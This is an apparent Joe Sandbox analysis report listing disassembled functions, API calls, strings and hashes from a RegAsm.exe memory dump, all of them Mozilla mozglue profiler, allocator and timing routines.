Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoUninitialize$combase.dll
API String ID: 4190559335-3846590027
Opcode ID: 4405c92032c56dcd78c14c0ae6fc8d58244c66ca68b9b5828efd0ba98a25e717
Instruction ID: 75c86a45e998cd4f3441d79a7d1bc02e6d5dd8357eb5899c603f1d4340cc5ace
Opcode Fuzzy Hash: 4405c92032c56dcd78c14c0ae6fc8d58244c66ca68b9b5828efd0ba98a25e717
Instruction Fuzzy Hash: 45015ABA709201CFEB00CF2BD958B7477F0FB06318F044229ED21C2A80EB71A856EE55

Function 6C12F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C12F561

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12F577
AcquireSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F585
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8), ref: 6C12F5A3

Strings

[I %d/%d] profiler_resume, xrefs: 6C12F239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C12F56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C12F499
[I %d/%d] profiler_pause_sampling, xrefs: 6C12F3A8

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 5ab22f385913d7447b0932eeb6ceeeed5ac9ef993260f8bc537af1735cd7ee76
Instruction ID: 4362cc042e086064ba202957b0b7a9263b02b52d9563263c680337e88458855f
Opcode Fuzzy Hash: 5ab22f385913d7447b0932eeb6ceeeed5ac9ef993260f8bc537af1735cd7ee76
Instruction Fuzzy Hash: 52F0E27A700204AFDB006F6BD848B7A7BBCFB862ADF000051FA1583B01DB399805AB71

Function 6C12F600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
Part of subcall function 6C129420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
Part of subcall function 6C129420: __Init_thread_footer.LIBCMT ref: 6C12949F

GetCurrentThreadId.KERNEL32 ref: 6C12F619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C12F598), ref: 6C12F621

Part of subcall function 6C1294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1294EE
Part of subcall function 6C1294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C129508

GetCurrentThreadId.KERNEL32 ref: 6C12F637
AcquireSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F645
ReleaseSRWLockExclusive.KERNEL32(6C16F4B8,?,?,00000000,?,6C12F598), ref: 6C12F663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C12F62A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 48d1665eb1df013a15ff323790c4b63801427f96c12235fe0d65d3d1aa059ccf
Instruction ID: 8fc46a31eab0520daca916816b7fa093d5518b95035df35d0c5142923ed61e7d
Opcode Fuzzy Hash: 48d1665eb1df013a15ff323790c4b63801427f96c12235fe0d65d3d1aa059ccf
Instruction Fuzzy Hash: 26F0827A300204AFDB006B6BC848F7A7B7DEB862ADF000055FA1583B41DB795C06A775

Function 6C0F0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C0F0DF8), ref: 6C0F0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C0F0EA1
__Init_thread_footer.LIBCMT ref: 6C0F0EB5
FreeLibrary.KERNEL32 ref: 6C0F0EC5

Strings

kernel32.dll, xrefs: 6C0F0E7D
GetProcessMitigationPolicy, xrefs: 6C0F0E9B

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 4d3309e9500c185d4a3751b7cc0da0d4833747492329d664b54b8a9f201f89f6
Instruction ID: 412092774ea71f005bc2ce5c909ef2bc4b010e503a681c08a0a02069899b2306
Opcode Fuzzy Hash: 4d3309e9500c185d4a3751b7cc0da0d4833747492329d664b54b8a9f201f89f6
Instruction Fuzzy Hash: 170124B07182C18BDA008FAAC91CB66B7F5F74631CF100525AD3182B40DB35A4A9AA11

Function 6C1205F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C11CFAE,?,?,?,6C0E31A7), ref: 6C1205FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C11CFAE,?,?,?,6C0E31A7), ref: 6C120616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C0E31A7), ref: 6C12061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C0E31A7), ref: 6C120627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C12061B, 6C120625
<jemalloc>, xrefs: 6C1205FA, 6C12060F

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 53f1afefa167a3048c210c6abcfdd77eb90ca885cee3cf82916864091858e878
Instruction ID: 020c216d9ac26eb0f4dc0ee5e38df788c78326f3e81c15152bbdfc4094c05630
Opcode Fuzzy Hash: 53f1afefa167a3048c210c6abcfdd77eb90ca885cee3cf82916864091858e878
Instruction Fuzzy Hash: 6AE08CE2A0101437F5142256AC86EBB7A1CDBCA934F080039FD0D82301E94AAD2EA1F6

Function 6C139240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C139BAE
free.MOZGLUE(?,?), ref: 6C139BC3
free.MOZGLUE(?,?), ref: 6C139BD9

Part of subcall function 6C1393B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C1394C8
Part of subcall function 6C1393B0: free.MOZGLUE(6C139281,?), ref: 6C1394DD

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 731f43ae7037f9dbb323351063b20baeda08893d4dbdcc274e266f89f6c788d4
Instruction ID: 03c4ffecfb62731b970c417d303990c012f48b9b0b20404126901ab57dd31f6c
Opcode Fuzzy Hash: 731f43ae7037f9dbb323351063b20baeda08893d4dbdcc274e266f89f6c788d4
Instruction Fuzzy Hash: E8B1BE71A04B158BCB01CF58C89059FF3F5BFC8328F148629E899AB741DB30E946CB91

Function 6C0F05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb730e4fa3d8b871a5abadcc1998a0c81af14faf17b5aa3f735771d5a9bfa288
Instruction ID: 65fe71f43b4ae2bdd5a727b5d24ed92083285207d885fc1db75f461800db9a89
Opcode Fuzzy Hash: eb730e4fa3d8b871a5abadcc1998a0c81af14faf17b5aa3f735771d5a9bfa288
Instruction Fuzzy Hash: 83A14AB4A047458FDB14CF29C594B99FBF5BF48308F4486AAD89997B00E730AA95CF90

Function 6C1271A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C126060: moz_xmalloc.MOZGLUE(00000024,F3604955,00000000,?,00000000,?,?,6C125FCB,6C1279A3), ref: 6C126078

free.MOZGLUE(-00000001), ref: 6C1272F6
free.MOZGLUE(?), ref: 6C127311

Strings

Copied unique strings, xrefs: 6C127320
333s, xrefs: 6C12731B
333s, xrefs: 6C127226
Spliced unique strings, xrefs: 6C127340

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: ca621c386297740a9416b46aef3e8055e474667bbf48370bfd2573c5a1ee2b3a
Instruction ID: a6b1eba5842332c8ab5a5bb9871e98d15571e5c136313eed396475b85897b617
Opcode Fuzzy Hash: ca621c386297740a9416b46aef3e8055e474667bbf48370bfd2573c5a1ee2b3a
Instruction Fuzzy Hash: D0718475F002198FDB18CF69C89069EB7F2AF94314F25C12ED819A7750DB35A986CBC1

Function 6C1414A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C1414C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1414E2
GetCurrentThreadId.KERNEL32 ref: 6C141546
InitializeConditionVariable.KERNEL32(?), ref: 6C1415BA
free.MOZGLUE(?), ref: 6C1416B4

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 7b46597bb5f7ee46284a80b51d87f95252b5abcaf3e76c78beeea8c06887d6eb
Instruction ID: 190da0a5b7e50f9b6ec760ad2fd88149c3de574388b96e0f19bed583a36f5f3b
Opcode Fuzzy Hash: 7b46597bb5f7ee46284a80b51d87f95252b5abcaf3e76c78beeea8c06887d6eb
Instruction Fuzzy Hash: 8961F076A00710DBDB11DF21C880BEABBB0BF8A308F44951CED8A57701DB35E959CB91

Function 6C13C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C13C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C13C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C13C29E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: e23c6bbc1cb57eca9ac9c37f8c13a3ef2388009866b488f89a02c2798e42c234
Instruction ID: 1d474a56de197d0a4937ee31a180e6dbcbbd20449b54a78a538ecbda61fe6a23
Opcode Fuzzy Hash: e23c6bbc1cb57eca9ac9c37f8c13a3ef2388009866b488f89a02c2798e42c234
Instruction Fuzzy Hash: 1D61BE71A00234CFCF14DFA8D8A45AEBBB5FF49318F155629E84AA7750C731A944CFA4

Function 6C139F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C139FDB
free.MOZGLUE(?,?), ref: 6C139FF0
free.MOZGLUE(?,?), ref: 6C13A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C13A0BE
free.MOZGLUE(?,?), ref: 6C13A0D5
free.MOZGLUE(?,?), ref: 6C13A0EB

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 4753309b5f0fa57515e7fb90abc0af96e1d2fd52de1a2aa9efd2cbe3513a92c6
Instruction ID: 26e8980a37d3a3aeb4193dce09d5294445242994ef4d8d1a0a4f27a3391458c0
Opcode Fuzzy Hash: 4753309b5f0fa57515e7fb90abc0af96e1d2fd52de1a2aa9efd2cbe3513a92c6
Instruction Fuzzy Hash: 6261D1755087119FC711CF58C48069AB3F5FF88328F549669E8999B702EB32E986CBC1

Function 6C13DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C13DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C13D38A,?), ref: 6C13DC6F
free.MOZGLUE(?,?,?,?,?,6C13D38A,?), ref: 6C13DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C13D38A,?), ref: 6C13DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C13D38A,?), ref: 6C13DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C13D38A,?), ref: 6C13DD4A

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 1f5888d54c216e4b78721edf23b7b33097f44378eaf6934073ff0ea59d72376a
Instruction ID: c1cbee51e1d90e4f44b3e72ecf59a102a4f74a5a56616f2ecc29b27abe7bfdf9
Opcode Fuzzy Hash: 1f5888d54c216e4b78721edf23b7b33097f44378eaf6934073ff0ea59d72376a
Instruction Fuzzy Hash: CF419DB5A00215CFCB00DF99C880A9AB7F6FF88318B555469E949ABB11DB31FC00CB90

Function 6C126590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C11FA80: GetCurrentThreadId.KERNEL32 ref: 6C11FA8D
Part of subcall function 6C11FA80: AcquireSRWLockExclusive.KERNEL32(6C16F448), ref: 6C11FA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C126727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C1267C8

Part of subcall function 6C134290: memcpy.VCRUNTIME140(?,?,6C142003,6C140AD9,?,6C140AD9,00000000,?,6C140AD9,?,00000004,?,6C141A62,?,6C142003,?), ref: 6C1342C4

Strings

data, xrefs: 6C126593

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 3658602acdec10c7069f01b615a1c09f9c7a2567b5cd85f7206dd444670bbab2
Instruction ID: 8fc7d108316206138adb0506c2d4e09f3a48fb3f6b1c27c3c2abaeb806fd24b9
Opcode Fuzzy Hash: 3658602acdec10c7069f01b615a1c09f9c7a2567b5cd85f7206dd444670bbab2
Instruction Fuzzy Hash: 8CD10179A083408FD720DF25C841B9FB7E5AFD5308F10492DE599D7B90DB34A889CB52

Function 6C12CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C12CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12CA69
Sleep.KERNEL32 ref: 6C12CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C12CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C12CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C12CB19

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: dd16000167526067954cffcd27567d4ddc6f77a8783b02702238d8cd65d591bd
Instruction ID: f037a4fcff370257748fc4472b71b0e7a955346cd862192dd12cf49d45f48a4d
Opcode Fuzzy Hash: dd16000167526067954cffcd27567d4ddc6f77a8783b02702238d8cd65d591bd
Instruction Fuzzy Hash: 2D213771B046488BD708EF38886526BF7BAFFC6344F408628E945A6680FF74D5888B81

Function 6C13C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C13C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C13C842

Part of subcall function 6C13CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C15B5EB,00000000), ref: 6C13CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C13C863
std::_Facet_Register.LIBCPMT ref: 6C13C875

Part of subcall function 6C11B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C15B636,?), ref: 6C11B143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C13C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13C8BC

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: fc95f752ba369d6c6e5ca238426809999ac2f9e550b9c81d8cc42747f68f9697
Instruction ID: 19829d3b585598f7cc6838b8dea7a43651dfdfc59613ce6c243f666fda89fea1
Opcode Fuzzy Hash: fc95f752ba369d6c6e5ca238426809999ac2f9e550b9c81d8cc42747f68f9697
Instruction Fuzzy Hash: 23118675B002159BCB00DFA5C8999BE7B75FF89358F000169E90697741DB309D18EBA1

Function 6C11D5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C0EEB57,?,?,?,?,?,?,?,?,?), ref: 6C11D652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C0EEB57,?), ref: 6C11D660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C0EEB57,?), ref: 6C11D673
free.MOZGLUE(?), ref: 6C11D888

Strings

|Enabled, xrefs: 6C11D81E

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
